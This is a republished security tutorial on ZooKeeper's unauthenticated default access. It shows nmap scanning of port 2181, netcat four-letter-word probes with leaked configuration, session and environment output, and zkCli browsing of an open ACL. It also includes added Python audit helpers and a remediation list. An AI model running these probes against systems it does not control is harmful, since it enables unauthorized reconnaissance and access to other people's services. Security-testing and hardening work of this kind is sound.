Zookeeper unauthorized access test problem

Preface

ZooKeeper is an open source coordination service for distributed applications. It is an open source implementation of Google's Chubby and an important component of Hadoop and HBase. It provides consistency services for distributed applications; its functions include configuration maintenance, naming services, distributed synchronization, group services and so on.

Zookeeper unauthorized access means that, after installation and deployment, Zookeeper requires no authentication by default. As a result the service can be reached and operated remotely, and a large amount of service-level information is exposed.

The default ports used are: 2181, 2182.

Detect whether the Zookeeper service is open

For example, use nmap to check whether a target address is running the Zookeeper service by testing whether port 2181 is open.

root@kali:~# nmap -Pn -p 2181 xx.xx.xx.xx
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-21 01:56 EDT
Nmap scan report for xx.xx.xx.xx.static.sz.js.chinamobile.com (xx.xx.xx.xx)
Host is up (0.016s latency).

PORT STATE SERVICE
2181/tcp open eforward

Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds

For batch detection, only the target address list needs to be changed.

Get information

conf Command

Outputs detailed information about the service configuration, including the client port, data path, log path, session timeouts and maximum number of client connections.

root@kali:~# echo conf | nc xx.xx.xx.xx 2181
clientPort=2171
dataDir=/opt/data/zookeeper/data/version-2
dataLogDir=/opt/data/zookeeper/data/version-2
tickTime=2000
maxClientCnxns=0
minSessionTimeout=4000
maxSessionTimeout=40000
serverId=0

cons Command

Lists detailed information about all clients/sessions connected to the current server.

root@kali:~# echo cons | nc xx.xx.xx.xx 2181 | more
/10.23.46.40:11958[1](queued=0,recved=27317,sent=27317,sid=0x1000000e029b16e,lop=PING,est=1571277639586,to=40000,lcxid=0x33,lzxid=0x286a720,lresp=2435779043,llat=0,minlat=0,avglat=0,maxlat=397)
/10.23.46.39:9688[1](queued=0,recved=27316,sent=27316,sid=0x1000000e029b17c,lop=PING,est=1571277641790,to=40000,lcxid=0x33,lzxid=0x286a71c,lresp=2435777895,llat=0,minlat=0,avglat=0,maxlat=560)

dump Command

Outputs outstanding sessions and ephemeral nodes; the command only returns data on the leader node.

root@kali:~# echo dump | nc xx.xx.xx.xx 2181 | more
SessionTracker dump:
Session Sets (21):
0 expires at Thu Jan 29 12:38:08 CST 1970:
0 expires at Thu Jan 29 12:38:10 CST 1970:
3 expires at Thu Jan 29 12:38:12 CST 1970:
0x1000000e01f0013
0x1000000e029fdde
0x1000000e029fe05
2 expires at Thu Jan 29 12:38:14 CST 1970:
0x1000000e02a4235
0x1000000e01f00e9
31 expires at Thu Jan 29 12:38:16 CST 1970:
0x1000000e01f067a
0x1000000e02a423c
0x1000000e01f0008
0x1000000e029fdf4
...

Non-leader nodes do not return any of this information.

envi Command

Prints detailed information about the server environment (Zookeeper version, host name, Java, OS and user properties).

root@kali:~# echo envi | nc xx.xx.xx.xx 2181
Environment:
zookeeper.version=3.4.13-2d71af4dbe22557fda74f9a9b4309b15a7487f03, built on 06/29/2018 04:05 GMT
host.name=c1b69852-ac24-11e8-88d9-a4bf01306d06
java.version=1.7.0_80
java.vendor=Oracle Corporation
java.home=/usr/java/jdk1.7.0_80/jre
java.class.path=/opt/midware/zookeeper/bin/../build/classes:/opt/midware/zookeeper/bin/../build/lib/*.jar:/opt/midware/zookeeper/bin/../lib/slf4j-log4j12-1.7.25.jar:/opt/midware/zookeeper/bin/../lib/slf4j-api-1.7.25.jar:/opt/midware/zookeeper/bin/../lib/netty-3.10.6.Final.jar:/opt/midware/zookeeper/bin/../lib/log4j-1.2.17.jar:/opt/midware/zookeeper/bin/../lib/jline-0.9.94.jar:/opt/midware/zookeeper/bin/../lib/audience-annotations-0.5.0.jar:/opt/midware/zookeeper/bin/../zookeeper-3.4.13.jar:/opt/midware/zookeeper/bin/../src/java/lib/*.jar:/opt/midware/zookeeper/bin/../conf:
java.library.path=/usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/lib
java.io.tmpdir=/tmp
java.compiler=<NA>
os.name=Linux
os.arch=amd64
os.version=3.10.0-327.36.3.el7.x86_64
user.name=root
user.home=/root
user.dir=/
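The four probes above (plus ruok) collected into one audit helper for checking hosts in your own inventory, which also covers the batch detection mentioned earlier. This is an added example, not code from the original article; the host and port are arguments, and the findings mirror the information each reply leaks.

```python
# Added audit helper (not from the original article): send ZooKeeper
# four-letter words to one host and turn the replies into findings.
import socket

FOUR_LETTER_WORDS = ("ruok", "conf", "envi", "cons", "dump")

def send_4lw(host, port, cmd, timeout=3.0):
    """Send one four-letter word; return the raw reply, or None if unreachable."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(cmd.encode("ascii"))
            chunks = []
            while True:               # the server closes the socket after its reply
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
        return b"".join(chunks).decode("utf-8", errors="replace")
    except OSError:
        return None

def parse_conf(reply):
    """Turn the key=value lines of a conf reply into a dict."""
    conf = {}
    for line in reply.splitlines():
        if "=" in line:
            key, _, value = line.partition("=")
            conf[key.strip()] = value.strip()
    return conf

def findings(replies):
    """Findings from a {word: reply-or-None} map, mirroring the checks above."""
    out = []
    if (replies.get("ruok") or "").strip() == "imok":
        out.append("ruok: service answers without authentication")
    conf = parse_conf(replies.get("conf") or "")
    if conf:
        out.append("conf: leaks dataDir=" + conf.get("dataDir", "?"))
        if conf.get("maxClientCnxns") == "0":   # 0 means no per-IP limit
            out.append("conf: maxClientCnxns=0, no per-IP connection limit")
    if "zookeeper.version=" in (replies.get("envi") or ""):
        out.append("envi: leaks version, JVM, OS and user details")
    if "sid=" in (replies.get("cons") or ""):
        out.append("cons: leaks client IPs and session ids")
    if "expires at" in (replies.get("dump") or ""):
        out.append("dump: leaks sessions and ephemeral nodes (leader only)")
    return out

def audit(host, port=2181):
    """Probe one host with every word and report what it exposed."""
    return findings({w: send_4lw(host, port, w) for w in FOUR_LETTER_WORDS})
```

Run `audit("10.0.0.5")` against a host you are responsible for; an empty list means none of the words answered, which is what a correctly whitelisted or firewalled server should produce.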

Connection Test

Installation Tools

For example, on Kali you can install the zookeeper package with the following command; the client connection tool zkCli.sh is then available.

root@kali:~# apt-get install zookeeper
...
root@kali:~# cd /usr/share/zookeeper/bin/
root@kali:/usr/share/zookeeper/bin# ls
zkCleanup.sh zkCli.sh zkEnv.sh zkServer.sh

Connection target

Use the -server parameter to specify the target to connect to.

root@kali:/usr/share/zookeeper/bin# ./zkCli.sh -server xx.xx.xx.xx:2181
Connecting to xx.xx.xx.xx:2181
Welcome to ZooKeeper!
JLine support is enabled
[zk: xx.xx.xx.xx:2181(CONNECTING) 0]

... (the prompt changes from CONNECTING to CONNECTED once the session is established)

Get system-related information

root@kali:/usr/share/zookeeper/bin# ./zkCli.sh -server xx.xx.xx.xx:2181
Connecting to xx.xx.xx.xx:2181
Welcome to ZooKeeper!
JLine support is enabled
[zk: xx.xx.xx.xx:2181(CONNECTING) 0]
WATCHER::
WatchedEvent state:SyncConnected type:None path:null
[zk: xx.xx.xx.xx:2181(CONNECTED) 0] ls /
[service, pms, DsMaster, Resource, monitor_lock, zookeeper]
[zk: xx.xx.xx.xx:2181(CONNECTED) 1] get /
cZxid = 0x0
ctime = Wed Dec 31 19:00:00 EST 1969
mZxid = 0x0
mtime = Wed Dec 31 19:00:00 EST 1969
pZxid = 0x4c0
cversion = 4
dataVersion = 0
aclVersion = 0
ephemeralOwner = 0x0
dataLength = 0
numChildren = 6
[zk: xx.xx.xx.xx:2181(CONNECTED) 2] get /service
cZxid = 0x2
ctime = Thu Aug 30 02:58:40 EDT 2018
mZxid = 0x2
mtime = Thu Aug 30 02:58:40 EDT 2018
pZxid = 0x1cb884d
cversion = 7
dataVersion = 0
aclVersion = 0
ephemeralOwner = 0x0
dataLength = 0
numChildren = 3
[zk: xx.xx.xx.xx:2181(CONNECTED) 3] getAcl /
'world,'anyone
: cdrwa

Remediation plan

1. Configure firewall policies to restrict which IP addresses may connect [this solution is recommended]

2. Do not expose Zookeeper to the external network

3. Enable user authentication and set ACLs
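A check for items 2 and 3 of the plan, added here and not part of the original article: it audits a zoo.cfg for an explicit bind address and a four-letter-word whitelist (4lw.commands.whitelist, available from Zookeeper 3.4.10), and flags a getAcl reply like the `'world,'anyone : cdrwa` seen above. The configuration values are constructed samples.

```python
# Added example, not from the original article: check a zoo.cfg and a zkCli
# getAcl reply against the remediation list. Sample values are constructed.
HARDENED_ZOO_CFG = """\
tickTime=2000
dataDir=/var/lib/zookeeper
clientPort=2181
clientPortAddress=10.0.0.5
4lw.commands.whitelist=ruok,srvr
"""

def parse_zoo_cfg(text):
    """key=value lines of zoo.cfg, skipping blanks and '#' comments."""
    cfg = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and "=" in line:
            key, _, value = line.partition("=")
            cfg[key.strip()] = value.strip()
    return cfg

def audit_zoo_cfg(text):
    """Config findings: unbound client port and an absent or loose 4lw whitelist."""
    cfg = parse_zoo_cfg(text)
    issues = []
    if "clientPortAddress" not in cfg:   # default binds the client port on all interfaces
        issues.append("clientPortAddress unset: client port listens on all interfaces")
    whitelist = cfg.get("4lw.commands.whitelist")
    if whitelist is None:
        issues.append("4lw.commands.whitelist unset: add an explicit whitelist (3.4.10+)")
    else:
        words = {w.strip() for w in whitelist.split(",")}
        if "*" in words:                 # '*' enables every four-letter word
            issues.append("4lw.commands.whitelist=*: every four-letter word enabled")
        leaked = sorted(words & {"conf", "cons", "dump", "envi"})
        if leaked:
            issues.append("whitelist still allows info-leaking words: " + ",".join(leaked))
    return issues

def world_anyone_perms(getacl_reply):
    """Permissions given to world:anyone in a zkCli 3.4 getAcl reply ('' if none)."""
    lines = [l.strip() for l in getacl_reply.splitlines() if l.strip()]
    for i in range(len(lines) - 1):
        if lines[i] == "'world,'anyone" and lines[i + 1].startswith(":"):
            return lines[i + 1][1:].strip()
    return ""

def acl_is_open(getacl_reply):
    """True when unauthenticated clients hold anything beyond read (r)."""
    return bool(set(world_anyone_perms(getacl_reply)) - {"r"})
```

Item 1 (firewall rules) is enforced outside Zookeeper and is not checked here.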

References

Zookeeper unauthorized access

http://vic.pub/zookeeper-unauthorized-access/

Summary

The above is the Zookeeper unauthorized access test problem as introduced by the editor. I hope it is helpful to everyone. If you have any questions, please leave a message and the editor will reply in time. I would also like to thank everyone for their support of the 123WORDPRESS.COM website!
If you find this article helpful, please feel free to reprint it, and please indicate the source. Thank you!
